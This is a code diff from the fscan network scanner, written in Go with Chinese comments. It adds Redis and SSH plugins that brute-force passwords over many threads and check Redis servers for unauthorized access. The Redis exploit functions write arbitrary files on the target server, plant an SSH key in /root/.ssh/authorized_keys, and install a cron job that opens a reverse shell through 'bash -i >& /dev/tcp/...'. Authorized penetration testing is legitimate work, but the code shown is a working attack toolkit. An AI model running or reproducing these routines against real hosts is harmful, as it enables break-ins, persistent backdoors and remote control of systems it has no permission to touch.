+					result := tryRedisCredential(scanCtx, info, credential, timeoutMs, maxRetries)
+					if result.Success {
+						select {
+						case resultChan <- result:
+							scanCancel() // 找到有效凭据，取消其他工作
+						default:
+						}
+						return
+					}
+				}
+			}
+		}()
+	}
+
+	// 发送工作
+	go func() {
+		for i, cred := range credentials {
+			select {
+			case <-scanCtx.Done():
+				break
+			default:
+				common.LogDebug(fmt.Sprintf("[%d/%d] 尝试密码: %s", i+1, len(credentials), cred.Password))
+				workChan <- cred
+			}
+		}
+		close(workChan)
+	}()
+
+	// 等待结果或完成
+	go func() {
+		wg.Wait()
+		close(resultChan)
+	}()
+
+	// 获取结果，考虑全局超时
+	select {
+	case result, ok := <-resultChan:
+		if ok && result != nil && result.Success {
+			return result
+		}
+		return nil
+	case <-ctx.Done():
+		common.LogDebug("Redis并发扫描全局超时")
+		scanCancel() // 确保取消所有未完成工作
+		return nil
+	}
+}
+
+// tryRedisCredential 尝试单个Redis凭据
+func tryRedisCredential(ctx context.Context, info *common.HostInfo, credential RedisCredential, timeoutMs int64, maxRetries int) *RedisScanResult {
+	var lastErr error
+
+	for retry := 0; retry < maxRetries; retry++ {
+		select {
+		case <-ctx.Done():
+			return &RedisScanResult{
+				Success:    false,
+				Error:      fmt.Errorf("全局超时"),
+				Credential: credential,
+			}
+		default:
+			if retry > 0 {
+				common.LogDebug(fmt.Sprintf("第%d次重试密码: %s", retry+1, credential.Password))
+				time.Sleep(500 * time.Millisecond) // 重试前等待
+			}
+
+			success, err := attemptRedisAuth(ctx, info, credential.Password, timeoutMs)
+			if success {
+				return &RedisScanResult{
+					Success:    true,
+					Credential: credential,
+				}
+			}
+
+			lastErr = err
+			if err != nil {
+				// 检查是否需要重试
+				if retryErr := common.CheckErrs(err); retryErr == nil {
+					break // 不需要重试的错误
+				}
+			}
+		}
+	}
+
+	return &RedisScanResult{
+		Success:    false,
+		Error:      lastErr,
+		Credential: credential,
+	}
+}
+
+// attemptRedisAuth 尝试Redis认证
+func attemptRedisAuth(ctx context.Context, info *common.HostInfo, password string, timeoutMs int64) (bool, error) {
+	// 创建独立于全局超时的单个连接超时上下文
+	connCtx, cancel := context.WithTimeout(context.Background(), time.Duration(timeoutMs)*time.Millisecond)
+	defer cancel()
+
+	// 结合全局上下文和连接超时上下文
+	mergedCtx, mergedCancel := context.WithCancel(connCtx)
+	defer mergedCancel()
+
+	// 监听全局上下文取消
+	go func() {
+		select {
+		case <-ctx.Done():
+			mergedCancel() // 全局超时会触发合并上下文取消
+		case <-connCtx.Done():
+			// 连接超时已经触发，无需操作
+		}
+	}()
+
+	connChan := make(chan struct {
+		success bool
+		err     error
+	}, 1)
+
+	go func() {
+		success, err := RedisConn(info, password)
+		select {
+		case <-mergedCtx.Done():
+		case connChan <- struct {
+			success bool
+			err     error
+		}{success, err}:
+		}
+	}()
+
+	select {
+	case result := <-connChan:
+		return result.success, result.err
+	case <-mergedCtx.Done():
+		if ctx.Err() != nil {
+			return false, fmt.Errorf("全局超时")
+		}
+		return false, fmt.Errorf("连接超时")
+	}
+}
+
+// RedisUnauth 尝试Redis未授权访问检测
+func RedisUnauth(ctx context.Context, info *common.HostInfo) (flag bool, err error) {
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	common.LogDebug(fmt.Sprintf("开始Redis未授权检测: %s", realhost))
+
+	// 创建带超时的连接
+	connCtx, cancel := context.WithTimeout(ctx, time.Duration(common.Timeout)*time.Second)
+	defer cancel()
+
+	connChan := make(chan struct {
+		conn net.Conn
+		err  error
+	}, 1)
+
+	go func() {
+		conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+		select {
+		case <-connCtx.Done():
+			if conn != nil {
+				conn.Close()
+			}
+		case connChan <- struct {
+			conn net.Conn
+			err  error
+		}{conn, err}:
+		}
+	}()
+
+	var conn net.Conn
+	select {
+	case result := <-connChan:
+		if result.err != nil {
+			common.LogError(fmt.Sprintf("Redis连接失败 %s: %v", realhost, result.err))
+			return false, result.err
+		}
+		conn = result.conn
+	case <-connCtx.Done():
+		return false, fmt.Errorf("连接超时")
+	}
+
+	defer conn.Close()
+
+	// 发送info命令测试未授权访问
+	common.LogDebug(fmt.Sprintf("发送info命令到: %s", realhost))
+	if _, err = conn.Write([]byte("info\r\n")); err != nil {
+		common.LogError(fmt.Sprintf("Redis %s 发送命令失败: %v", realhost, err))
+		return false, err
+	}
+
+	// 读取响应
+	reply, err := readreply(conn)
+	if err != nil {
+		common.LogError(fmt.Sprintf("Redis %s 读取响应失败: %v", realhost, err))
+		return false, err
+	}
+	common.LogDebug(fmt.Sprintf("收到响应，长度: %d", len(reply)))
+
+	// 检查未授权访问
+	if !strings.Contains(reply, "redis_version") {
+		common.LogDebug(fmt.Sprintf("Redis %s 未发现未授权访问", realhost))
+		return false, nil
+	}
+
+	// 发现未授权访问，获取配置
+	common.LogDebug(fmt.Sprintf("Redis %s 发现未授权访问，尝试获取配置", realhost))
+	dbfilename, dir, err = getconfig(conn)
+	if err != nil {
+		result := fmt.Sprintf("Redis %s 发现未授权访问", realhost)
+		common.LogSuccess(result)
+		return true, err
+	}
+
+	// 输出详细信息
+	result := fmt.Sprintf("Redis %s 发现未授权访问 文件位置:%s/%s", realhost, dir, dbfilename)
+	common.LogSuccess(result)
+	return true, nil
+}
+
+// RedisConn 尝试Redis连接
+func RedisConn(info *common.HostInfo, pass string) (bool, error) {
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	common.LogDebug(fmt.Sprintf("尝试Redis连接: %s [%s]", realhost, pass))
+
+	// 建立TCP连接
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	if err != nil {
+		common.LogDebug(fmt.Sprintf("连接失败: %v", err))
+		return false, err
+	}
+	defer conn.Close()
+
+	// 设置超时
+	if err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)); err != nil {
+		common.LogDebug(fmt.Sprintf("设置超时失败: %v", err))
+		return false, err
+	}
+
+	// 发送认证命令
+	authCmd := fmt.Sprintf("auth %s\r\n", pass)
+	common.LogDebug("发送认证命令")
+	if _, err = conn.Write([]byte(authCmd)); err != nil {
+		common.LogDebug(fmt.Sprintf("发送认证命令失败: %v", err))
+		return false, err
+	}
+
+	// 读取响应
+	reply, err := readreply(conn)
+	if err != nil {
+		common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+		return false, err
+	}
+	common.LogDebug(fmt.Sprintf("收到响应: %s", reply))
+
+	// 认证成功
+	if strings.Contains(reply, "+OK") {
+		common.LogDebug("认证成功，获取配置信息")
+
+		// 获取配置信息
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("Redis认证成功 %s [%s]", realhost, pass)
+			common.LogSuccess(result)
+			common.LogDebug(fmt.Sprintf("获取配置失败: %v", err))
+			return true, err
+		}
+
+		result := fmt.Sprintf("Redis认证成功 %s [%s] 文件位置:%s/%s",
+			realhost, pass, dir, dbfilename)
+		common.LogSuccess(result)
+		return true, nil
+	}
+
+	common.LogDebug("认证失败")
+	return false, fmt.Errorf("认证失败")
+}
+
+// ExploitRedis 执行Redis漏洞利用
+func ExploitRedis(ctx context.Context, info *common.HostInfo, conn net.Conn, password string) error {
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	common.LogDebug(fmt.Sprintf("开始Redis漏洞利用: %s", realhost))
+
+	// 如果配置为不进行测试则直接返回
+	if common.DisableRedis {
+		common.LogDebug("Redis漏洞利用已禁用")
+		return nil
+	}
+
+	// 获取当前配置
+	var err error
+	if dbfilename == "" || dir == "" {
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			common.LogError(fmt.Sprintf("获取Redis配置失败: %v", err))
+			return err
+		}
+	}
+
+	// 检查是否超时
+	select {
+	case <-ctx.Done():
+		return fmt.Errorf("全局超时")
+	default:
+	}
+
+	// 支持任意文件写入
+	if common.RedisWritePath != "" && common.RedisWriteContent != "" {
+		common.LogDebug(fmt.Sprintf("尝试写入文件: %s", common.RedisWritePath))
+
+		// 提取目录和文件名
+		filePath := common.RedisWritePath
+		dirPath := filepath.Dir(filePath)
+		fileName := filepath.Base(filePath)
+
+		common.LogDebug(fmt.Sprintf("目标目录: %s, 文件名: %s", dirPath, fileName))
+
+		success, msg, err := writeCustomFile(conn, dirPath, fileName, common.RedisWriteContent)
+		if err != nil {
+			common.LogError(fmt.Sprintf("文件写入失败: %v", err))
+		} else if success {
+			common.LogSuccess(fmt.Sprintf("成功写入文件: %s", filePath))
+		} else {
+			common.LogError(fmt.Sprintf("文件写入失败: %s", msg))
+		}
+	}
+
+	// 支持从本地文件读取并写入
+	if common.RedisWritePath != "" && common.RedisWriteFile != "" {
+		common.LogDebug(fmt.Sprintf("尝试从文件 %s 读取内容并写入到 %s", common.RedisWriteFile, common.RedisWritePath))
+
+		// 读取本地文件内容
+		fileContent, err := os.ReadFile(common.RedisWriteFile)
+		if err != nil {
+			common.LogError(fmt.Sprintf("读取本地文件失败: %v", err))
+		} else {
+			// 提取目录和文件名
+			dirPath := filepath.Dir(common.RedisWritePath)
+			fileName := filepath.Base(common.RedisWritePath)
+
+			success, msg, err := writeCustomFile(conn, dirPath, fileName, string(fileContent))
+			if err != nil {
+				common.LogError(fmt.Sprintf("文件写入失败: %v", err))
+			} else if success {
+				common.LogSuccess(fmt.Sprintf("成功将文件 %s 的内容写入到 %s", common.RedisWriteFile, common.RedisWritePath))
+			} else {
+				common.LogError(fmt.Sprintf("文件写入失败: %s", msg))
+			}
+		}
+	}
+
+	// 支持向SSH目录写入密钥（向后兼容）
+	if common.RedisFile != "" {
+		common.LogDebug(fmt.Sprintf("尝试写入SSH密钥: %s", common.RedisFile))
+		success, msg, err := writekey(conn, common.RedisFile)
+		if err != nil {
+			common.LogError(fmt.Sprintf("SSH密钥写入失败: %v", err))
+		} else if success {
+			common.LogSuccess(fmt.Sprintf("SSH密钥写入成功"))
+		} else {
+			common.LogError(fmt.Sprintf("SSH密钥写入失败: %s", msg))
+		}
+	}
+
+	// 支持写入定时任务（向后兼容）
+	if common.RedisShell != "" {
+		common.LogDebug(fmt.Sprintf("尝试写入定时任务: %s", common.RedisShell))
+		success, msg, err := writecron(conn, common.RedisShell)
+		if err != nil {
+			common.LogError(fmt.Sprintf("定时任务写入失败: %v", err))
+		} else if success {
+			common.LogSuccess(fmt.Sprintf("定时任务写入成功"))
+		} else {
+			common.LogError(fmt.Sprintf("定时任务写入失败: %s", msg))
+		}
+	}
+
+	// 恢复数据库配置
+	common.LogDebug("开始恢复数据库配置")
+	if err = recoverdb(dbfilename, dir, conn); err != nil {
+		common.LogError(fmt.Sprintf("Redis %v 恢复数据库失败: %v", realhost, err))
+	} else {
+		common.LogDebug("数据库配置恢复成功")
+	}
+
+	common.LogDebug(fmt.Sprintf("Redis漏洞利用完成: %s", realhost))
 	return nil
-}
+}
+
+// writeCustomFile 向指定路径写入自定义内容
+func writeCustomFile(conn net.Conn, dirPath, fileName, content string) (flag bool, text string, err error) {
+	common.LogDebug(fmt.Sprintf("开始向 %s/%s 写入内容", dirPath, fileName))
+	flag = false
+
+	// 设置文件目录
+	common.LogDebug(fmt.Sprintf("设置目录: %s", dirPath))
+	if _, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dir %s\r\n", dirPath))); err != nil {
+		common.LogDebug(fmt.Sprintf("设置目录失败: %v", err))
+		return flag, text, err
+	}
+	if text, err = readreply(conn); err != nil {
+		common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+		return flag, text, err
+	}
+
+	// 设置文件名
+	if strings.Contains(text, "OK") {
+		common.LogDebug(fmt.Sprintf("设置文件名: %s", fileName))
+		if _, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename %s\r\n", fileName))); err != nil {
+			common.LogDebug(fmt.Sprintf("设置文件名失败: %v", err))
+			return flag, text, err
+		}
+		if text, err = readreply(conn); err != nil {
+			common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+			return flag, text, err
+		}
+
+		// 写入内容
+		if strings.Contains(text, "OK") {
+			common.LogDebug("写入文件内容")
+			// 处理多行内容，添加换行符
+			safeContent := strings.ReplaceAll(content, "\"", "\\\"")
+			safeContent = strings.ReplaceAll(safeContent, "\n", "\\n")
+
+			if _, err = conn.Write([]byte(fmt.Sprintf("set x \"%s\"\r\n", safeContent))); err != nil {
+				common.LogDebug(fmt.Sprintf("写入内容失败: %v", err))
+				return flag, text, err
+			}
+			if text, err = readreply(conn); err != nil {
+				common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+				return flag, text, err
+			}
+
+			// 保存更改
+			if strings.Contains(text, "OK") {
+				common.LogDebug("保存更改")
+				if _, err = conn.Write([]byte("save\r\n")); err != nil {
+					common.LogDebug(fmt.Sprintf("保存失败: %v", err))
+					return flag, text, err
+				}
+				if text, err = readreply(conn); err != nil {
+					common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+					return flag, text, err
+				}
+				if strings.Contains(text, "OK") {
+					common.LogDebug("文件写入成功")
+					flag = true
+				}
+			}
+		}
+	}
+
+	// 截断过长的响应文本
+	text = strings.TrimSpace(text)
+	if len(text) > 50 {
+		text = text[:50]
+	}
+	common.LogDebug(fmt.Sprintf("写入文件完成, 状态: %v, 响应: %s", flag, text))
+	return flag, text, err
+}
+
+// writekey 向Redis写入SSH密钥
+func writekey(conn net.Conn, filename string) (flag bool, text string, err error) {
+	common.LogDebug(fmt.Sprintf("开始写入SSH密钥, 文件: %s", filename))
+	flag = false
+
+	// 设置文件目录为SSH目录
+	common.LogDebug("设置目录: /root/.ssh/")
+	if _, err = conn.Write([]byte("CONFIG SET dir /root/.ssh/\r\n")); err != nil {
+		common.LogDebug(fmt.Sprintf("设置目录失败: %v", err))
+		return flag, text, err
+	}
+	if text, err = readreply(conn); err != nil {
+		common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+		return flag, text, err
+	}
+
+	// 设置文件名为authorized_keys
+	if strings.Contains(text, "OK") {
+		common.LogDebug("设置文件名: authorized_keys")
+		if _, err = conn.Write([]byte("CONFIG SET dbfilename authorized_keys\r\n")); err != nil {
+			common.LogDebug(fmt.Sprintf("设置文件名失败: %v", err))
+			return flag, text, err
+		}
+		if text, err = readreply(conn); err != nil {
+			common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+			return flag, text, err
+		}
+
+		// 读取并写入SSH密钥
+		if strings.Contains(text, "OK") {
+			// 读取密钥文件
+			common.LogDebug(fmt.Sprintf("读取密钥文件: %s", filename))
+			key, err := Readfile(filename)
+			if err != nil {
+				text = fmt.Sprintf("读取密钥文件 %s 失败: %v", filename, err)
+				common.LogDebug(text)
+				return flag, text, err
+			}
+			if len(key) == 0 {
+				text = fmt.Sprintf("密钥文件 %s 为空", filename)
+				common.LogDebug(text)
+				return flag, text, err
+			}
+			common.LogDebug(fmt.Sprintf("密钥内容长度: %d", len(key)))
+
+			// 写入密钥
+			common.LogDebug("写入密钥内容")
+			if _, err = conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key))); err != nil {
+				common.LogDebug(fmt.Sprintf("写入密钥失败: %v", err))
+				return flag, text, err
+			}
+			if text, err = readreply(conn); err != nil {
+				common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+				return flag, text, err
+			}
+
+			// 保存更改
+			if strings.Contains(text, "OK") {
+				common.LogDebug("保存更改")
+				if _, err = conn.Write([]byte("save\r\n")); err != nil {
+					common.LogDebug(fmt.Sprintf("保存失败: %v", err))
+					return flag, text, err
+				}
+				if text, err = readreply(conn); err != nil {
+					common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+					return flag, text, err
+				}
+				if strings.Contains(text, "OK") {
+					common.LogDebug("SSH密钥写入成功")
+					flag = true
+				}
+			}
+		}
+	}
+
+	// 截断过长的响应文本
+	text = strings.TrimSpace(text)
+	if len(text) > 50 {
+		text = text[:50]
+	}
+	common.LogDebug(fmt.Sprintf("写入SSH密钥完成, 状态: %v, 响应: %s", flag, text))
+	return flag, text, err
+}
+
+// writecron 向Redis写入定时任务
+func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
+	common.LogDebug(fmt.Sprintf("开始写入定时任务, 目标地址: %s", host))
+	flag = false
+
+	// 首先尝试Ubuntu系统的cron路径
+	common.LogDebug("尝试Ubuntu系统路径: /var/spool/cron/crontabs/")
+	if _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n")); err != nil {
+		common.LogDebug(fmt.Sprintf("设置Ubuntu路径失败: %v", err))
+		return flag, text, err
+	}
+	if text, err = readreply(conn); err != nil {
+		common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+		return flag, text, err
+	}
+
+	// 如果Ubuntu路径失败，尝试CentOS系统的cron路径
+	if !strings.Contains(text, "OK") {
+		common.LogDebug("尝试CentOS系统路径: /var/spool/cron/")
+		if _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n")); err != nil {
+			common.LogDebug(fmt.Sprintf("设置CentOS路径失败: %v", err))
+			return flag, text, err
+		}
+		if text, err = readreply(conn); err != nil {
+			common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+			return flag, text, err
+		}
+	}
+
+	// 如果成功设置目录，继续后续操作
+	if strings.Contains(text, "OK") {
+		common.LogDebug("成功设置cron目录")
+
+		// 设置数据库文件名为root
+		common.LogDebug("设置文件名: root")
+		if _, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n")); err != nil {
+			common.LogDebug(fmt.Sprintf("设置文件名失败: %v", err))
+			return flag, text, err
+		}
+		if text, err = readreply(conn); err != nil {
+			common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+			return flag, text, err
+		}
+
+		if strings.Contains(text, "OK") {
+			// 解析目标主机地址
+			target := strings.Split(host, ":")
+			if len(target) < 2 {
+				common.LogDebug(fmt.Sprintf("主机地址格式错误: %s", host))
+				return flag, "主机地址格式错误", err
+			}
+			scanIp, scanPort := target[0], target[1]
+			common.LogDebug(fmt.Sprintf("目标地址解析: IP=%s, Port=%s", scanIp, scanPort))
+
+			// 写入反弹shell的定时任务
+			common.LogDebug("写入定时任务")
+			cronCmd := fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n",
+				scanIp, scanPort)
+			if _, err = conn.Write([]byte(cronCmd)); err != nil {
+				common.LogDebug(fmt.Sprintf("写入定时任务失败: %v", err))
+				return flag, text, err
+			}
+			if text, err = readreply(conn); err != nil {
+				common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+				return flag, text, err
+			}
+
+			// 保存更改
+			if strings.Contains(text, "OK") {
+				common.LogDebug("保存更改")
+				if _, err = conn.Write([]byte("save\r\n")); err != nil {
+					common.LogDebug(fmt.Sprintf("保存失败: %v", err))
+					return flag, text, err
+				}
+				if text, err = readreply(conn); err != nil {
+					common.LogDebug(fmt.Sprintf("读取响应失败: %v", err))
+					return flag, text, err
+				}
+				if strings.Contains(text, "OK") {
+					common.LogDebug("定时任务写入成功")
+					flag = true
+				}
+			}
+		}
+	}
+
+	// 截断过长的响应文本
+	text = strings.TrimSpace(text)
+	if len(text) > 50 {
+		text = text[:50]
+	}
+	common.LogDebug(fmt.Sprintf("写入定时任务完成, 状态: %v, 响应: %s", flag, text))
+	return flag, text, err
+}
+
+// Readfile 读取文件内容并返回第一个非空行
+func Readfile(filename string) (string, error) {
+	common.LogDebug(fmt.Sprintf("读取文件: %s", filename))
+
+	file, err := os.Open(filename)
+	if err != nil {
+		common.LogDebug(fmt.Sprintf("打开文件失败: %v", err))
+		return "", err
+	}
+	defer file.Close()
+
+	scanner := bufio.NewScanner(file)
+	for scanner.Scan() {
+		text := strings.TrimSpace(scanner.Text())
+		if text != "" {
+			common.LogDebug("找到非空行")
+			return text, nil
+		}
+	}
+	common.LogDebug("文件内容为空")
+	return "", err
+}
+
+// readreply 读取Redis服务器响应
+func readreply(conn net.Conn) (string, error) {
+	common.LogDebug("读取Redis响应")
+	// 设置1秒读取超时
+	conn.SetReadDeadline(time.Now().Add(time.Second))
+
+	bytes, err := io.ReadAll(conn)
+	if len(bytes) > 0 {
+		common.LogDebug(fmt.Sprintf("收到响应，长度: %d", len(bytes)))
+		err = nil
+	} else {
+		common.LogDebug("未收到响应数据")
+	}
+	return string(bytes), err
+}
+
+// getconfig 获取Redis配置信息
+func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
+	common.LogDebug("开始获取Redis配置信息")
+
+	// 获取数据库文件名
+	common.LogDebug("获取数据库文件名")
+	if _, err = conn.Write([]byte("CONFIG GET dbfilename\r\n")); err != nil {
+		common.LogDebug(fmt.Sprintf("获取数据库文件名失败: %v", err))
+		return
+	}
+	text, err := readreply(conn)
+	if err != nil {
+		common.LogDebug(fmt.Sprintf("读取数据库文件名响应失败: %v", err))
+		return
+	}
+
+	// 解析数据库文件名
+	text1 := strings.Split(text, "\r\n")
+	if len(text1) > 2 {
+		dbfilename = text1[len(text1)-2]
+	} else {
+		dbfilename = text1[0]
+	}
+	common.LogDebug(fmt.Sprintf("数据库文件名: %s", dbfilename))
+
+	// 获取数据库目录
+	common.LogDebug("获取数据库目录")
+	if _, err = conn.Write([]byte("CONFIG GET dir\r\n")); err != nil {
+		common.LogDebug(fmt.Sprintf("获取数据库目录失败: %v", err))
+		return
+	}
+	text, err = readreply(conn)
+	if err != nil {
+		common.LogDebug(fmt.Sprintf("读取数据库目录响应失败: %v", err))
+		return
+	}
+
+	// 解析数据库目录
+	text1 = strings.Split(text, "\r\n")
+	if len(text1) > 2 {
+		dir = text1[len(text1)-2]
+	} else {
+		dir = text1[0]
+	}
+	common.LogDebug(fmt.Sprintf("数据库目录: %s", dir))
+
+	return
+}
+
+// recoverdb 恢复Redis数据库配置
+func recoverdb(dbfilename string, dir string, conn net.Conn) (err error) {
+	common.LogDebug("开始恢复Redis数据库配置")
+
+	// 恢复数据库文件名
+	common.LogDebug(fmt.Sprintf("恢复数据库文件名: %s", dbfilename))
+	if _, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename %s\r\n", dbfilename))); err != nil {
+		common.LogDebug(fmt.Sprintf("恢复数据库文件名失败: %v", err))
+		return
+	}
+	if _, err = readreply(conn); err != nil {
+		common.LogDebug(fmt.Sprintf("读取恢复文件名响应失败: %v", err))
+		return
+	}
+
+	// 恢复数据库目录
+	common.LogDebug(fmt.Sprintf("恢复数据库目录: %s", dir))
+	if _, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dir %s\r\n", dir))); err != nil {
+		common.LogDebug(fmt.Sprintf("恢复数据库目录失败: %v", err))
+		return
+	}
+	if _, err = readreply(conn); err != nil {
+		common.LogDebug(fmt.Sprintf("读取恢复目录响应失败: %v", err))
+		return
+	}
+
+	common.LogDebug("数据库配置恢复完成")
+	return
+}

Plugins/SSH.go

@@ -1,19 +1,363 @@
 package Plugins
 
 import (
+	"context"
+	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/adapter"
+	"github.com/shadow1ng/fscan/common/output"
+	"golang.org/x/crypto/ssh"
+	"io/ioutil"
+	"net"
+	"strings"
+	"sync"
+	"time"
 )
 
+// SshCredential 表示一个SSH凭据
+type SshCredential struct {
+	Username string
+	Password string
+}
+
+// SshScanResult 表示SSH扫描结果
+type SshScanResult struct {
+	Success    bool
+	Error      error
+	Credential SshCredential
+}
+
 // SshScan 扫描SSH服务弱密码
-// 现在完全使用新的插件架构
 func SshScan(info *common.HostInfo) error {
-	// 使用新的插件架构
-	if adapter.TryNewArchitecture("ssh", info) {
-		return nil // 新架构处理成功
+	if common.DisableBrute {
+		return nil
 	}
-	
-	// 如果新架构不支持，记录错误（理论上不应该发生）
-	common.LogError("SSH插件新架构不可用，请检查插件注册")
+
+	target := fmt.Sprintf("%v:%v", info.Host, info.Ports)
+	common.LogDebug(fmt.Sprintf("开始扫描 %s", target))
+
+	// 创建全局超时上下文
+	globalCtx, globalCancel := context.WithTimeout(context.Background(), time.Duration(common.GlobalTimeout)*time.Second)
+	defer globalCancel()
+
+	// 创建结果通道
+	resultChan := make(chan *SshScanResult, 1)
+
+	// 启动一个协程进行扫描
+	go func() {
+		// 如果指定了SSH密钥，使用密钥认证而非密码爆破
+		if common.SshKeyPath != "" {
+			common.LogDebug(fmt.Sprintf("使用SSH密钥认证: %s", common.SshKeyPath))
+
+			// 尝试使用密钥连接各个用户
+			for _, user := range common.Userdict["ssh"] {
+				select {
+				case <-globalCtx.Done():
+					common.LogDebug("全局超时，中止密钥认证")
+					return
+				default:
+					common.LogDebug(fmt.Sprintf("尝试使用密钥认证用户: %s", user))
+
+					success, err := attemptKeyAuth(info, user, common.SshKeyPath, common.Timeout)
+					if success {
+						credential := SshCredential{
+							Username: user,
+							Password: "", // 使用密钥，无密码
+						}
+
+						resultChan <- &SshScanResult{
+							Success:    true,
+							Credential: credential,
+						}
+						return
+					} else {
+						common.LogDebug(fmt.Sprintf("密钥认证失败: %s, 错误: %v", user, err))
+					}
+				}
+			}
+
+			common.LogDebug("所有用户密钥认证均失败")
+			resultChan <- nil
+			return
+		}
+
+		// 否则使用密码爆破
+		credentials := generateCredentials(common.Userdict["ssh"], common.Passwords)
+		common.LogDebug(fmt.Sprintf("开始尝试用户名密码组合 (总用户数: %d, 总密码数: %d, 总组合数: %d)",
+			len(common.Userdict["ssh"]), len(common.Passwords), len(credentials)))
+
+		// 使用工作池并发扫描
+		result := concurrentSshScan(globalCtx, info, credentials, common.Timeout, common.MaxRetries, common.ModuleThreadNum)
+		resultChan <- result
+	}()
+
+	// 等待结果或全局超时
+	select {
+	case result := <-resultChan:
+		if result != nil {
+			// 记录成功结果
+			logAndSaveSuccess(info, target, result)
+			return nil
+		}
+	case <-globalCtx.Done():
+		common.LogDebug(fmt.Sprintf("扫描 %s 全局超时", target))
+		return fmt.Errorf("全局超时，扫描未完成")
+	}
+
+	common.LogDebug(fmt.Sprintf("扫描完成，未发现有效凭据"))
 	return nil
-}
+}
+
+// attemptKeyAuth 尝试使用SSH密钥认证
+func attemptKeyAuth(info *common.HostInfo, username, keyPath string, timeoutSeconds int64) (bool, error) {
+	pemBytes, err := ioutil.ReadFile(keyPath)
+	if err != nil {
+		return false, fmt.Errorf("读取密钥失败: %v", err)
+	}
+
+	signer, err := ssh.ParsePrivateKey(pemBytes)
+	if err != nil {
+		return false, fmt.Errorf("解析密钥失败: %v", err)
+	}
+
+	config := &ssh.ClientConfig{
+		User: username,
+		Auth: []ssh.AuthMethod{ssh.PublicKeys(signer)},
+		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
+			return nil
+		},
+		Timeout: time.Duration(timeoutSeconds) * time.Second,
+	}
+
+	client, err := ssh.Dial("tcp", fmt.Sprintf("%v:%v", info.Host, info.Ports), config)
+	if err != nil {
+		return false, err
+	}
+	defer client.Close()
+
+	session, err := client.NewSession()
+	if err != nil {
+		return false, err
+	}
+	defer session.Close()
+
+	return true, nil
+}
+
+// generateCredentials 生成所有用户名密码组合
+func generateCredentials(users, passwords []string) []SshCredential {
+	// 预分配切片容量，避免频繁重新分配
+	totalCredentials := len(users) * len(passwords)
+	credentials := make([]SshCredential, 0, totalCredentials)
+	
+	for _, user := range users {
+		for _, pass := range passwords {
+			actualPass := strings.Replace(pass, "{user}", user, -1)
+			credentials = append(credentials, SshCredential{
+				Username: user,
+				Password: actualPass,
+			})
+		}
+	}
+	return credentials
+}
+
+// concurrentSshScan 并发扫描SSH服务
+func concurrentSshScan(ctx context.Context, info *common.HostInfo, credentials []SshCredential, timeout int64, maxRetries, maxThreads int) *SshScanResult {
+	// 限制并发数
+	if maxThreads <= 0 {
+		maxThreads = 10 // 默认值
+	}
+
+	if maxThreads > len(credentials) {
+		maxThreads = len(credentials)
+	}
+
+	// 创建工作池
+	var wg sync.WaitGroup
+	resultChan := make(chan *SshScanResult, 1)
+	workChan := make(chan SshCredential, maxThreads)
+	scanCtx, scanCancel := context.WithCancel(ctx)
+	defer scanCancel()
+
+	// 启动工作协程
+	for i := 0; i < maxThreads; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			for credential := range workChan {
+				select {
+				case <-scanCtx.Done():
+					return
+				default:
+					result := trySshCredential(info, credential, timeout, maxRetries)
+					if result.Success {
+						select {
+						case resultChan <- result:
+							scanCancel() // 找到有效凭据，取消其他工作
+						default:
+						}
+						return
+					}
+				}
+			}
+		}()
+	}
+
+	// 发送工作
+	go func() {
+		for i, cred := range credentials {
+			select {
+			case <-scanCtx.Done():
+				break
+			default:
+				common.LogDebug(fmt.Sprintf("[%d/%d] 尝试: %s:%s", i+1, len(credentials), cred.Username, cred.Password))
+				workChan <- cred
+			}
+		}
+		close(workChan)
+	}()
+
+	// 等待结果或完成
+	go func() {
+		wg.Wait()
+		close(resultChan)
+	}()
+
+	// 获取结果
+	select {
+	case result, ok := <-resultChan:
+		if ok {
+			return result
+		}
+	case <-ctx.Done():
+		common.LogDebug("父上下文取消，中止所有扫描")
+	}
+
+	return nil
+}
+
+// trySshCredential 尝试单个SSH凭据
+func trySshCredential(info *common.HostInfo, credential SshCredential, timeout int64, maxRetries int) *SshScanResult {
+	var lastErr error
+
+	for retry := 0; retry < maxRetries; retry++ {
+		if retry > 0 {
+			common.LogDebug(fmt.Sprintf("第%d次重试: %s:%s", retry+1, credential.Username, credential.Password))
+			time.Sleep(500 * time.Millisecond) // 重试前等待
+		}
+
+		success, err := attemptSshConnection(info, credential.Username, credential.Password, timeout)
+		if success {
+			return &SshScanResult{
+				Success:    true,
